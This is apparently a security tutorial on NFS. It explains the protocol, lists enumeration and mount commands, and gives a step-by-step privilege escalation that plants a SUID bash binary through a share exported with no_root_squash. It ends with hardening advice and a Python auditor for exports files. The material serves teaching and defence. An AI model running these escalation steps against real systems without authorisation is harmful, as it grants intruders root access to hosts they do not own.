Understand, Enumerate and Exploit NFS
NFS (Network File System) enables a server to share portions of its file system with clients over a network. Users and applications can interact with these remote files as if they were local. This functionality is achieved by mounting a remote directory onto a local directory on the client system. Access permissions to these files are controlled at the server level, based on user and group credentials.
How does NFS work?
Mounting:
A client system requests to mount a directory from the NFS server. The request is handled by the mount daemon via RPC.
File Handle Assignment:
The server validates the request and provides a unique file handle, which serves as a reference for accessing specific files and directories.
Access Control:
When a client attempts to access a file, the NFS daemon checks parameters like the file handle, user ID (UID), and group ID (GID). These determine the client’s access permissions, such as read or write access.
Enumerating NFS Shares
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <target-ip>
showmount -e <target-ip>
Mounting an NFS share:
mkdir /tmp/mount
sudo mount -t nfs <target-ip>:<share> /tmp/mount/ -o nolock
Exploiting NFS
One common misconfiguration is disabling root_squash. When enabled, root_squash maps root users on client systems to the minimally privileged user nfsnobody on the server. Without root_squash, clients can upload files with SUID bits set, enabling privilege escalation. Files with the SUID bit execute with the privileges of their owner. For NFS exploitation, this means uploading a SUID-enabled binary to escalate privileges to root:
- NFS Access
- Gain Low Privilege Shell
- Upload Bash executable to the NFS share
- Set SUID permissions through NFS due to misconfigured root squash
- Log in, e.g. through SSH
- Execute SUID bit bash executable
- Get root access
1. Identify the NFS share:
showmount -e <target-ip>
2. Gain low-privilege shell access on the target.
3. Copy the Bash executable from the target to the local machine:
scp -i key_name username@<target-ip>:/bin/bash ~/Downloads/bash
4. Mount the NFS share locally and upload the executable. Then, set its permissions:
chmod +s /path/to/uploaded/bash
5. Run the uploaded bash binary to gain a root shell:
./bash -p
Securing NFS configurations
Enable root_squash:
Prevent remote root access by ensuring root_squash is enabled for each export in /etc/exports (it is the default, so remove any no_root_squash option):
/etc/exported/share *(rw,sync,root_squash)
Restrict Access:
Limit NFS share access to specific IPs and subnets.
Use Strong Authentication:
Implement Kerberos or similar authentication mechanisms.
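A check for the three hardening points above, as an added example that is not part of the original post: it parses exports(5)-style text and flags entries that use no_root_squash, export to any host, or still allow AUTH_SYS (no sec=krb5* flavor). The sample file content, paths and finding labels are constructed for illustration.

```python
import re

# Constructed sample /etc/exports content (not taken from any real host).
SAMPLE_EXPORTS = """\
# constructed example
/srv/share    *(rw,sync,no_root_squash)
/srv/projects 10.0.5.0/24(rw,sync,root_squash,sec=krb5p)
/srv/backup   10.0.5.10(ro,sync) \\
              *.lab.example(rw,no_root_squash,sec=krb5)
"""

# One client entry: "host(opt,opt)", bare "host", or "(opt,opt)" with no host.
ENTRY = re.compile(r"([^\s()]*)(?:\(([^)]*)\))?")

def audit_exports(text):
    """Return (path, client, finding) tuples for risky export entries."""
    findings = []
    # Join backslash-continued lines, then drop comments and blank lines.
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *tokens = line.split()
        defaults = []
        for token in tokens:
            if token.startswith("-"):      # "-opt,opt": defaults for later clients
                defaults = token[1:].split(",")
                continue
            match = ENTRY.fullmatch(token)
            if not match:                  # e.g. unbalanced parenthesis
                findings.append((path, token, "unparsed"))
                continue
            client = match.group(1)
            own = [o.strip() for o in (match.group(2) or "").split(",") if o.strip()]
            opts = defaults + own
            # The last squash option wins; root_squash is the default.
            squash = [o for o in opts if o in ("root_squash", "no_root_squash")]
            if squash and squash[-1] == "no_root_squash":
                findings.append((path, client, "no_root_squash"))
            if client in ("", "*"):        # no host or "*": any client may mount
                findings.append((path, client, "world_export"))
            # Without sec=, the flavor is sys: UID/GID are asserted by the client.
            sec = [o[4:] for o in opts if o.startswith("sec=")]
            if "sys" in (sec[-1].split(":") if sec else ["sys"]):
                findings.append((path, client, "auth_sys"))
    return findings

if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} [{client or '<any host>'}]: {finding}")
```

To audit a real server, pass the contents of its /etc/exports file to audit_exports instead of the constructed sample.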
